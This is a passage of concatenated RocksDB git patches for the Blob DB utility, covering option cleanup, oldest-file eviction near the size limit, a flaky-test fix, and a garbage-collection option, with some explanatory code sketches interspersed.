0; + uint32_t header_crc = 0; + uint32_t blob_crc = 0; Slice key; Slice value; std::string key_buf; From c1e99eddc87b57d50a746ff042de28e7d8d96956 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 31 Oct 2017 16:33:55 -0700 Subject: [PATCH 181/205] Blob DB: cleanup unused options Summary: * Clean up num_concurrent_simple_blobs. We don't do concurrent writes (we take write_mutex_), so it doesn't make sense to have multiple non-TTL files open. We can revisit this later when we want to improve writes. * Clean up the eviction callback; we have no plan to use it for now. * Rename s/open_simple_blob_files_/open_non_ttl_file_/ and s/open_blob_files_/open_ttl_files_/ to avoid confusion.
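The SelectBlobFile() rewrite below keeps a single open_non_ttl_file_, checked first under the read lock and then re-checked under the write lock before a new file is created. A minimal sketch of that check/re-check idiom, assuming std::shared_mutex in place of RocksDB's ReadLock/WriteLock wrappers:

    #include <memory>
    #include <shared_mutex>

    class NonTtlFileHolder {
     public:
      std::shared_ptr<int> GetOrCreate() {
        {
          std::shared_lock<std::shared_mutex> rl(mutex_);  // cheap, shared
          if (file_ != nullptr) return file_;
        }
        std::unique_lock<std::shared_mutex> wl(mutex_);  // exclusive
        if (file_ != nullptr) return file_;  // CHECK again: lost the race
        file_ = std::make_shared<int>();     // stand-in for NewBlobFile()
        return file_;
      }

     private:
      std::shared_mutex mutex_;
      std::shared_ptr<int> file_;  // the single open non-TTL file
    };

The second check is required because two writers can both fail the read-locked check and then acquire the write lock in turn; without it, the loser would create a second file.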
Closes https://github.com/facebook/rocksdb/pull/3088 Differential Revision: D6182598 Pulled By: yiwu-arbug fbshipit-source-id: 99e6f5e01fa66d31309cdb06ce48502464bac6ad --- utilities/blob_db/blob_db.cc | 2 - utilities/blob_db/blob_db.h | 9 -- utilities/blob_db/blob_db_impl.cc | 163 ++++++++---------------------- utilities/blob_db/blob_db_impl.h | 17 +--- utilities/blob_db/blob_db_test.cc | 1 - 5 files changed, 45 insertions(+), 147 deletions(-) diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index 947840751e5..1fd9261417b 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -186,8 +186,6 @@ void BlobDBOptions::Dump(Logger* log) const { bytes_per_sync); ROCKS_LOG_HEADER(log, " blob_db_options.blob_file_size: %" PRIu64, blob_file_size); - ROCKS_LOG_HEADER(log, "blob_db_options.num_concurrent_simple_blobs: %" PRIu32, - num_concurrent_simple_blobs); ROCKS_LOG_HEADER(log, " blob_db_options.ttl_extractor: %p", ttl_extractor.get()); ROCKS_LOG_HEADER(log, " blob_db_options.compression: %d", diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index 76ab95555a0..1ef382ab867 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -63,20 +63,11 @@ struct BlobDBOptions { // after it exceeds that size uint64_t blob_file_size = 256 * 1024 * 1024; - // how many files to use for simple blobs at one time - uint32_t num_concurrent_simple_blobs = 1; - // Instead of setting TTL explicitly by calling PutWithTTL or PutUntil, // applications can set a TTLExtractor which can extract TTL from key-value // pairs. std::shared_ptr ttl_extractor = nullptr; - // eviction callback. - // this function will be called for every blob that is getting - // evicted. - std::function - gc_evict_cb_fn; - // what compression to use for Blob's CompressionType compression = kNoCompression; diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 8f4b876842e..7c27be789d0 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -413,7 +413,7 @@ Status BlobDBImpl::OpenAllFiles() { expiration_range.second); } } else { - open_blob_files_.insert(bfptr); + open_ttl_files_.insert(bfptr); } } } @@ -493,23 +493,23 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { std::shared_ptr BlobDBImpl::FindBlobFileLocked( uint64_t expiration) const { - if (open_blob_files_.empty()) return nullptr; + if (open_ttl_files_.empty()) return nullptr; std::shared_ptr tmp = std::make_shared(); tmp->expiration_range_ = std::make_pair(expiration, 0); - auto citr = open_blob_files_.equal_range(tmp); - if (citr.first == open_blob_files_.end()) { - assert(citr.second == open_blob_files_.end()); + auto citr = open_ttl_files_.equal_range(tmp); + if (citr.first == open_ttl_files_.end()) { + assert(citr.second == open_ttl_files_.end()); - std::shared_ptr check = *(open_blob_files_.rbegin()); + std::shared_ptr check = *(open_ttl_files_.rbegin()); return (check->expiration_range_.second < expiration) ? 
nullptr : check; } if (citr.first != citr.second) return *(citr.first); auto finditr = citr.second; - if (finditr != open_blob_files_.begin()) --finditr; + if (finditr != open_ttl_files_.begin()) --finditr; bool b2 = (*finditr)->expiration_range_.second < expiration; bool b1 = (*finditr)->expiration_range_.first > expiration; @@ -530,11 +530,17 @@ std::shared_ptr BlobDBImpl::CheckOrCreateWriterLocked( } std::shared_ptr BlobDBImpl::SelectBlobFile() { - uint32_t val = blob_rgen.Next(); { ReadLock rl(&mutex_); - if (open_simple_files_.size() == bdb_options_.num_concurrent_simple_blobs) - return open_simple_files_[val % bdb_options_.num_concurrent_simple_blobs]; + if (open_non_ttl_file_ != nullptr) { + return open_non_ttl_file_; + } + } + + // CHECK again + WriteLock wl(&mutex_); + if (open_non_ttl_file_ != nullptr) { + return open_non_ttl_file_; } std::shared_ptr bfile = NewBlobFile("SelectBlobFile"); @@ -557,12 +563,6 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { bfile->header_valid_ = true; bfile->SetHasTTL(false); - // CHECK again - WriteLock wl(&mutex_); - if (open_simple_files_.size() == bdb_options_.num_concurrent_simple_blobs) { - return open_simple_files_[val % bdb_options_.num_concurrent_simple_blobs]; - } - Status s = writer->WriteHeader(bfile->header_); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, @@ -574,7 +574,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { dir_change_.store(true); blob_files_.insert(std::make_pair(bfile->BlobFileNumber(), bfile)); - open_simple_files_.push_back(bfile); + open_non_ttl_file_ = bfile; return bfile; } @@ -625,7 +625,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { bfile->file_size_ = BlobLogHeader::kSize; // set the first value of the range, since that is - // concrete at this time. also necessary to add to open_blob_files_ + // concrete at this time. 
also necessary to add to open_ttl_files_ bfile->expiration_range_ = expiration_range; WriteLock wl(&mutex_); @@ -647,7 +647,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { dir_change_.store(true); blob_files_.insert(std::make_pair(bfile->BlobFileNumber(), bfile)); - open_blob_files_.insert(bfile); + open_ttl_files_.insert(bfile); epoch_of_++; return bfile; @@ -1192,9 +1192,9 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { blob_files_.size()); ROCKS_LOG_INFO(db_options_.info_log, "Number of open files %" PRIu64, - open_blob_files_.size()); + open_ttl_files_.size()); - for (auto bfile : open_blob_files_) { + for (auto bfile : open_ttl_files_) { assert(!bfile->Immutable()); } @@ -1215,6 +1215,7 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { } Status BlobDBImpl::CloseBlobFile(std::shared_ptr bfile) { + assert(bfile != nullptr); Status s; ROCKS_LOG_INFO(db_options_.info_log, "Close blob file %" PRIu64, bfile->BlobFileNumber()); @@ -1222,13 +1223,12 @@ Status BlobDBImpl::CloseBlobFile(std::shared_ptr bfile) { WriteLock wl(&mutex_); if (bfile->HasTTL()) { - size_t erased __attribute__((__unused__)) = open_blob_files_.erase(bfile); + size_t erased __attribute__((__unused__)); + erased = open_ttl_files_.erase(bfile); assert(erased == 1); } else { - auto iter = std::find(open_simple_files_.begin(), - open_simple_files_.end(), bfile); - assert(iter != open_simple_files_.end()); - open_simple_files_.erase(iter); + assert(bfile == open_non_ttl_file_); + open_non_ttl_file_ = nullptr; } } @@ -1411,7 +1411,7 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { uint64_t epoch_now = EpochNow(); ReadLock rl(&mutex_); - for (auto bfile : open_blob_files_) { + for (auto bfile : open_ttl_files_) { { ReadLock lockbfile_r(&bfile->mutex_); @@ -1436,14 +1436,14 @@ std::pair BlobDBImpl::FsyncFiles(bool aborted) { std::vector> process_files; { ReadLock rl(&mutex_); - for (auto fitr : open_blob_files_) { + for (auto fitr : open_ttl_files_) { if (fitr->NeedsFsync(true, bdb_options_.bytes_per_sync)) process_files.push_back(fitr); } - for (auto fitr : open_simple_files_) { - if (fitr->NeedsFsync(true, bdb_options_.bytes_per_sync)) - process_files.push_back(fitr); + if (open_non_ttl_file_ != nullptr && + open_non_ttl_file_->NeedsFsync(true, bdb_options_.bytes_per_sync)) { + process_files.push_back(open_non_ttl_file_); } } @@ -1799,7 +1799,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, // but under the asusmption that this is only called when a // file is Immutable, we can reduce the critical section bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, - bool is_oldest_simple_blob_file, + bool is_oldest_non_ttl_file, std::string* reason) { if (bfile->HasTTL()) { ExpirationRange expiration_range = bfile->GetExpirationRange(); @@ -1857,7 +1857,7 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, return false; } - if (is_oldest_simple_blob_file) { + if (is_oldest_non_ttl_file) { *reason = "out of space and is the oldest simple blob file"; return true; } @@ -1923,72 +1923,6 @@ std::pair BlobDBImpl::DeleteObsoleteFiles(bool aborted) { return std::make_pair(!aborted, -1); } -bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr bfile) { - std::shared_ptr reader = - bfile->OpenSequentialReader(env_, db_options_, env_options_); - if (!reader) { - ROCKS_LOG_ERROR( - db_options_.info_log, - "File sequential reader could not be opened for evict callback: %s", - bfile->PathName().c_str()); - return false; - } - - ReadLock 
lockbfile_r(&bfile->mutex_); - - BlobLogHeader header; - Status s = reader->ReadHeader(&header); - if (!s.ok()) { - ROCKS_LOG_ERROR( - db_options_.info_log, - "Failure to read header for blob-file during evict callback %s", - bfile->PathName().c_str()); - return false; - } - - ColumnFamilyHandle* cfh = - db_impl_->GetColumnFamilyHandleUnlocked(bfile->column_family_id()); - BlobLogRecord record; - Reader::ReadLevel full = Reader::kReadHeaderKeyBlob; - while (reader->ReadRecord(&record, full).ok()) { - bdb_options_.gc_evict_cb_fn(cfh, record.key, record.value); - } - - return true; -} - -std::pair BlobDBImpl::RemoveTimerQ(TimerQueue* tq, - bool aborted) { - WriteLock wl(&mutex_); - for (auto itr = cb_threads_.begin(); itr != cb_threads_.end(); ++itr) { - if ((*itr).get() != tq) continue; - - cb_threads_.erase(itr); - break; - } - return std::make_pair(false, -1); -} - -std::pair BlobDBImpl::CallbackEvicts( - TimerQueue* tq, std::shared_ptr bfile, bool aborted) { - if (aborted) return std::make_pair(false, -1); - bool succ = CallbackEvictsImpl(bfile); - if (succ) { - ROCKS_LOG_DEBUG(db_options_.info_log, "Eviction callbacks completed %s", - bfile->PathName().c_str()); - } - - WriteLock wl(&mutex_); - bfile->SetCanBeDeleted(); - obsolete_files_.push_front(bfile); - if (tq) { - // all of the callbacks have been processed - tqueue_.add(0, std::bind(&BlobDBImpl::RemoveTimerQ, this, tq, - std::placeholders::_1)); - } - return std::make_pair(false, -1); -} - void BlobDBImpl::CopyBlobFiles( std::vector>* bfiles_copy) { ReadLock rl(&mutex_); @@ -2010,7 +1944,7 @@ void BlobDBImpl::FilterSubsetOfFiles( uint64_t now = EpochNow(); size_t files_processed = 0; - bool simple_blob_file_found = false; + bool non_ttl_file_found = false; for (auto bfile : blob_files) { if (files_processed >= files_to_collect) break; // if this is the first time processing the file @@ -2030,15 +1964,14 @@ void BlobDBImpl::FilterSubsetOfFiles( // then it should not be GC'd if (bfile->Obsolete() || !bfile->Immutable()) continue; - bool is_oldest_simple_blob_file = false; - if (!simple_blob_file_found && !bfile->HasTTL()) { - is_oldest_simple_blob_file = true; - simple_blob_file_found = true; + bool is_oldest_non_ttl_file = false; + if (!non_ttl_file_found && !bfile->HasTTL()) { + is_oldest_non_ttl_file = true; + non_ttl_file_found = true; } std::string reason; - bool shouldgc = - ShouldGCFile(bfile, now, is_oldest_simple_blob_file, &reason); + bool shouldgc = ShouldGCFile(bfile, now, is_oldest_non_ttl_file, &reason); if (!shouldgc) { ROCKS_LOG_DEBUG(db_options_.info_log, "File has been skipped for GC ttl %s %" PRIu64 " %" PRIu64 @@ -2096,25 +2029,11 @@ std::pair BlobDBImpl::RunGC(bool aborted) { } if (!obsoletes.empty()) { - bool evict_cb = (!!bdb_options_.gc_evict_cb_fn); - std::shared_ptr tq; - if (evict_cb) tq = std::make_shared(); - - // if evict callback is present, first schedule the callback thread WriteLock wl(&mutex_); for (auto bfile : obsoletes) { - bool last_file = (bfile == obsoletes.back()); - - if (!evict_cb) { - bfile->SetCanBeDeleted(); - obsolete_files_.push_front(bfile); - } else { - tq->add(0, std::bind(&BlobDBImpl::CallbackEvicts, this, - (last_file) ? 
tq.get() : nullptr, bfile, - std::placeholders::_1)); - } + bfile->SetCanBeDeleted(); + obsolete_files_.push_front(bfile); } - if (evict_cb) cb_threads_.emplace_back(tq); } // reschedule diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index b18d26e1f4e..f9036300810 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -305,7 +305,7 @@ class BlobDBImpl : public BlobDB { // tt - current time // last_id - the id of the non-TTL file to evict bool ShouldGCFile(std::shared_ptr bfile, uint64_t now, - bool is_oldest_simple_blob_file, std::string* reason); + bool is_oldest_non_ttl_file, std::string* reason); // collect all the blob log files from the blob directory Status GetAllLogFiles(std::set>* file_nums); @@ -370,14 +370,8 @@ class BlobDBImpl : public BlobDB { std::pair EvictCompacted(bool aborted); - bool CallbackEvictsImpl(std::shared_ptr bfile); - std::pair RemoveTimerQ(TimerQueue* tq, bool aborted); - std::pair CallbackEvicts(TimerQueue* tq, - std::shared_ptr bfile, - bool aborted); - // Adds the background tasks to the timer queue void StartBackgroundTasks(); @@ -467,12 +461,12 @@ class BlobDBImpl : public BlobDB { // epoch or version of the open files. std::atomic epoch_of_; - // All opened non-TTL blob files. - std::vector> open_simple_files_; + // opened non-TTL blob file. + std::shared_ptr open_non_ttl_file_; // all the blob files which are currently being appended to based // on variety of incoming TTL's - std::multiset, blobf_compare_ttl> open_blob_files_; + std::multiset, blobf_compare_ttl> open_ttl_files_; // packet of information to put in lockess delete(s) queue struct delete_packet_t { @@ -505,9 +499,6 @@ class BlobDBImpl : public BlobDB { // timer based queue to execute tasks TimerQueue tqueue_; - // timer queues to call eviction callbacks. - std::vector> cb_threads_; - // only accessed in GC thread, hence not atomic. The epoch of the // GC task. Each execution is one epoch. Helps us in allocating // files to one execution diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 85507eb5f00..4dcf1a752bd 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -268,7 +268,6 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { bdb_options.ttl_range_secs = 1000; bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; - bdb_options.num_concurrent_simple_blobs = 1; bdb_options.ttl_extractor = ttl_extractor_; bdb_options.disable_background_tasks = true; Open(bdb_options, options); From f98efcb1e346052cd820bd21f73bd362a185fea1 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Thu, 2 Nov 2017 12:02:42 -0700 Subject: [PATCH 182/205] Blob DB: Evict oldest blob file when close to blob db size limit Summary: Evict the oldest blob file and put it in the obsolete_files list when close to the blob DB size limit. The file will be deleted when the `DeleteObsoleteFiles` background job runs next time. For now I set the `kEvictOldestFileAtSize` constant, which controls when to evict the oldest file, at 90%. It could be tweaked or made into an option if really needed; I didn't want to expose it as an option prematurely as there are already too many :) .
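A minimal sketch of the 90% threshold arithmetic this change introduces; the free function and parameter names are illustrative, not the actual BlobDBImpl members:

    #include <cstdint>

    constexpr double kEvictOldestFileAtSize = 0.9;  // evict at 90% of limit

    // Writes fail outright only at the full blob_dir_size limit; eviction of
    // the oldest file kicks in earlier, once a write would cross 90% of it.
    bool ShouldEvictOldestFile(uint64_t used_bytes, uint64_t incoming_bytes,
                               uint64_t blob_dir_size) {
      if (blob_dir_size == 0) return false;  // 0 means no limit configured
      return (used_bytes + incoming_bytes) >
             static_cast<uint64_t>(kEvictOldestFileAtSize * blob_dir_size);
    }

Evicting at 90% rather than 100% leaves headroom for in-flight writes while the DeleteObsoleteFiles job catches up.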
Closes https://github.com/facebook/rocksdb/pull/3094 Differential Revision: D6187340 Pulled By: sagar0 fbshipit-source-id: 687f8262101b9301bf964b94025a2fe9d8573421 --- utilities/blob_db/blob_db_impl.cc | 78 +++++++++++++++++++++++++------ utilities/blob_db/blob_db_impl.h | 16 ++++++- utilities/blob_db/blob_db_test.cc | 44 +++++++++++++++-- 3 files changed, 119 insertions(+), 19 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 7c27be789d0..db01aadf74f 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -62,7 +62,7 @@ bool blobf_compare_ttl::operator()(const std::shared_ptr& lhs, if (lhs->expiration_range_.first > rhs->expiration_range_.first) { return false; } - return lhs->BlobFileNumber() > rhs->BlobFileNumber(); + return lhs->BlobFileNumber() < rhs->BlobFileNumber(); } void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( @@ -117,7 +117,8 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, total_periods_ampl_(0), total_blob_space_(0), open_p1_done_(false), - debug_level_(0) { + debug_level_(0), + oldest_file_evicted_(false) { blob_dir_ = (bdb_options_.path_relative) ? dbname + "/" + bdb_options_.blob_dir : bdb_options_.blob_dir; @@ -171,7 +172,8 @@ BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) last_period_ampl_(0), total_periods_write_(0), total_periods_ampl_(0), - total_blob_space_(0) { + total_blob_space_(0), + oldest_file_evicted_(false) { if (!bdb_options_.blob_dir.empty()) blob_dir_ = (bdb_options_.path_relative) ? db_->GetName() + "/" + bdb_options_.blob_dir @@ -931,20 +933,56 @@ uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, return has_expiration ? expiration : kNoExpiration; } +std::shared_ptr BlobDBImpl::GetOldestBlobFile() { + std::vector> blob_files; + CopyBlobFiles(&blob_files, [](const std::shared_ptr& f) { + return !f->Obsolete() && f->Immutable(); + }); + blobf_compare_ttl compare; + return *std::min_element(blob_files.begin(), blob_files.end(), compare); +} + +bool BlobDBImpl::EvictOldestBlobFile() { + auto oldest_file = GetOldestBlobFile(); + if (oldest_file == nullptr) { + return false; + } + + WriteLock wl(&mutex_); + oldest_file->SetCanBeDeleted(); + obsolete_files_.push_front(oldest_file); + oldest_file_evicted_.store(true); + return true; +} + +Status BlobDBImpl::CheckSize(size_t blob_size) { + uint64_t new_space_util = total_blob_space_.load() + blob_size; + if (bdb_options_.blob_dir_size > 0) { + if (!bdb_options_.is_fifo && + (new_space_util > bdb_options_.blob_dir_size)) { + return Status::NoSpace( + "Write failed, as writing it would exceed blob_dir_size limit."); + } + if (bdb_options_.is_fifo && !oldest_file_evicted_.load() && + (new_space_util > + kEvictOldestFileAtSize * bdb_options_.blob_dir_size)) { + EvictOldestBlobFile(); + } + } + + return Status::OK(); +} + Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, const Slice& value, uint64_t expiration, std::string* index_entry) { auto size_put = BlobLogRecord::kHeaderSize + key.size() + value.size(); - if (bdb_options_.blob_dir_size > 0 && - (total_blob_space_.load() + size_put) > bdb_options_.blob_dir_size) { - if (!bdb_options_.is_fifo) { - return Status::NoSpace("Blob DB reached the maximum configured size."); - } + Status s = CheckSize(size_put); + if (!s.ok()) { + return s; } - Status s; - uint64_t blob_offset = 0; uint64_t key_offset = 0; { @@ -1910,7 +1948,12 @@ std::pair 
BlobDBImpl::DeleteObsoleteFiles(bool aborted) { } // directory change. Fsync - if (file_deleted) dir_ent_->Fsync(); + if (file_deleted) { + dir_ent_->Fsync(); + + // reset oldest_file_evicted flag + oldest_file_evicted_.store(false); + } // put files back into obsolete if for some reason, delete failed if (!tobsolete.empty()) { @@ -1924,13 +1967,18 @@ std::pair BlobDBImpl::DeleteObsoleteFiles(bool aborted) { } void BlobDBImpl::CopyBlobFiles( - std::vector>* bfiles_copy) { + std::vector>* bfiles_copy, + std::function&)> predicate) { ReadLock rl(&mutex_); - // take a copy - bfiles_copy->reserve(blob_files_.size()); for (auto const& p : blob_files_) { - bfiles_copy->push_back(p.second); + bool pred_value = true; + if (predicate) { + pred_value = predicate(p.second); + } + if (pred_value) { + bfiles_copy->push_back(p.second); + } } } diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index f9036300810..fc36712bed6 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -205,6 +205,10 @@ class BlobDBImpl : public BlobDB { // how often to schedule check seq files period static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000; + // when should oldest file be evicted: + // on reaching 90% of blob_dir_size + static constexpr double kEvictOldestFileAtSize = 0.9; + using BlobDB::Put; Status Put(const WriteOptions& options, const Slice& key, const Slice& value) override; @@ -414,7 +418,9 @@ class BlobDBImpl : public BlobDB { bool FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, uint64_t blob_offset, uint64_t blob_size); - void CopyBlobFiles(std::vector>* bfiles_copy); + void CopyBlobFiles( + std::vector>* bfiles_copy, + std::function&)> predicate = {}); void FilterSubsetOfFiles( const std::vector>& blob_files, @@ -423,6 +429,12 @@ class BlobDBImpl : public BlobDB { uint64_t EpochNow() { return env_->NowMicros() / 1000000; } + Status CheckSize(size_t blob_size); + + std::shared_ptr GetOldestBlobFile(); + + bool EvictOldestBlobFile(); + // the base DB DBImpl* db_impl_; Env* env_; @@ -526,6 +538,8 @@ class BlobDBImpl : public BlobDB { bool open_p1_done_; uint32_t debug_level_; + + std::atomic oldest_file_evicted_; }; } // namespace blob_db diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 4dcf1a752bd..0eb4d791b84 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -700,12 +700,15 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { VerifyDB({{"foo", "v2"}}); } -TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { +// This test is no longer valid since we now return an error when we go +// over the configured blob_dir_size. +// The test needs to be re-written later in such a way that writes continue +// after a GC happens. +TEST_F(BlobDBTest, DISABLED_GCOldestSimpleBlobFileWhenOutOfSpace) { // Use mock env to stop wall clock. Options options; options.env = mock_env_.get(); BlobDBOptions bdb_options; - bdb_options.is_fifo = true; bdb_options.blob_dir_size = 100; bdb_options.blob_file_size = 100; bdb_options.min_blob_size = 0; @@ -927,7 +930,7 @@ TEST_F(BlobDBTest, MigrateFromPlainRocksDB) { } // Test to verify that a NoSpace IOError Status is returned on reaching -// blob_dir_size limit. +// blob_dir_size limit. TEST_F(BlobDBTest, OutOfSpace) { // Use mock env to stop wall clock. 
Options options; @@ -949,6 +952,41 @@ ASSERT_TRUE(s.IsNoSpace()); } +TEST_F(BlobDBTest, EvictOldestFileWhenCloseToSpaceLimit) { + // Use mock env to stop wall clock. + Options options; + BlobDBOptions bdb_options; + bdb_options.blob_dir_size = 270; + bdb_options.blob_file_size = 100; + bdb_options.disable_background_tasks = true; + bdb_options.is_fifo = true; + Open(bdb_options); + + // Each stored blob has an overhead of about 32 bytes currently. + // So a 100 byte blob should take up 132 bytes. + std::string value(100, 'v'); + ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key1", value, 10)); + + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + + // Adding another 100 byte blob would take the total size to 264 bytes + // (2*132), which is more than 90% of blob_dir_size. So, the oldest file + // should be evicted and put in obsolete files list. + ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key2", value, 60)); + + auto obsolete_files = bdb_impl->TEST_GetObsoleteFiles(); + ASSERT_EQ(1, obsolete_files.size()); + ASSERT_TRUE(obsolete_files[0]->Immutable()); + ASSERT_EQ(blob_files[0]->BlobFileNumber(), + obsolete_files[0]->BlobFileNumber()); + + bdb_impl->TEST_DeleteObsoleteFiles(); + obsolete_files = bdb_impl->TEST_GetObsoleteFiles(); + ASSERT_TRUE(obsolete_files.empty()); +} + TEST_F(BlobDBTest, InlineSmallValues) { constexpr uint64_t kMaxExpiration = 1000; Random rnd(301); From 11bacd578765dad2f92b361cc73df0e635301723 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 2 Nov 2017 13:20:28 -0700 Subject: [PATCH 183/205] Blob DB: Fix flaky BlobDBTest::GCExpiredKeyWhileOverwriting test Summary: The test intends to wait until the key is overwritten before proceeding with garbage collection. It failed to wait for `PutUntil` to finally finish. Fixing it.
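For context, SyncPoint::LoadDependency({{"A", "B"}}) makes any thread reaching TEST_SYNC_POINT("B") block until another thread has passed TEST_SYNC_POINT("A"). The fix moves the markers from PutBlobValue to PutUntil so the dependency brackets the entire overwrite, roughly:

    // Condensed from the test diff below: GC must finish reading the old
    // value before the overwrite starts, and may relocate the blob only
    // after the overwrite is fully written (PutUntil returned), not merely
    // after its WriteBatch was built.
    SyncPoint::GetInstance()->LoadDependency(
        {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB",
          "BlobDBImpl::PutUntil:Start"},
         {"BlobDBImpl::PutUntil:Finish",
          "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}});
    SyncPoint::GetInstance()->EnableProcessing();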
Closes https://github.com/facebook/rocksdb/pull/3116 Differential Revision: D6222833 Pulled By: yiwu-arbug fbshipit-source-id: fa9b57a772b92a66cf250b44e7975c43f62f45c5 --- utilities/blob_db/blob_db_impl.cc | 4 ++-- utilities/blob_db/blob_db_test.cc | 8 ++++---- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index db01aadf74f..79e2203e01a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -838,6 +838,7 @@ Status BlobDBImpl::PutWithTTL(const WriteOptions& options, Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t expiration) { + TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start"); MutexLock l(&write_mutex_); SequenceNumber sequence = GetLatestSequenceNumber() + 1; WriteBatch batch; @@ -845,13 +846,13 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, if (s.ok()) { s = db_->Write(options, &batch); } + TEST_SYNC_POINT("BlobDBImpl::PutUntil:Finish"); return s; } Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t expiration, SequenceNumber sequence, WriteBatch* batch) { - TEST_SYNC_POINT("BlobDBImpl::PutBlobValue:Start"); Status s; std::string index_entry; uint32_t column_family_id = @@ -903,7 +904,6 @@ Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, } } - TEST_SYNC_POINT("BlobDBImpl::PutBlobValue:Finish"); return s; } diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 0eb4d791b84..9ffdb234f7c 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -642,8 +642,8 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", - "BlobDBImpl::PutBlobValue:Start"}, - {"BlobDBImpl::PutBlobValue:Finish", + "BlobDBImpl::PutUntil:Start"}, + {"BlobDBImpl::PutUntil:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}}); SyncPoint::GetInstance()->EnableProcessing(); @@ -680,8 +680,8 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", - "BlobDBImpl::PutBlobValue:Start"}, - {"BlobDBImpl::PutBlobValue:Finish", + "BlobDBImpl::PutUntil:Start"}, + {"BlobDBImpl::PutUntil:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"}}); SyncPoint::GetInstance()->EnableProcessing(); From 632f36dcd3360bf3d287af65bc98bd2db2d2b79a Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 2 Nov 2017 15:47:30 -0700 Subject: [PATCH 184/205] Blob DB: option to enable garbage collection Summary: Add an option to enable/disable auto garbage collection, where we keep counting how many keys have been evicted by either deletion or compaction and decide whether to garbage collect a blob file. Auto garbage collection is disabled by default for now, since the whole logic is not fully tested and we plan to make major changes to it.
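A minimal usage sketch of the new knob; the database path and surrounding setup are illustrative, assuming the BlobDB::Open entry point of this version:

    #include <string>

    #include "rocksdb/options.h"
    #include "utilities/blob_db/blob_db.h"

    rocksdb::Status OpenBlobDBWithGC(const std::string& dbname,
                                     rocksdb::blob_db::BlobDB** db) {
      rocksdb::Options options;
      options.create_if_missing = true;
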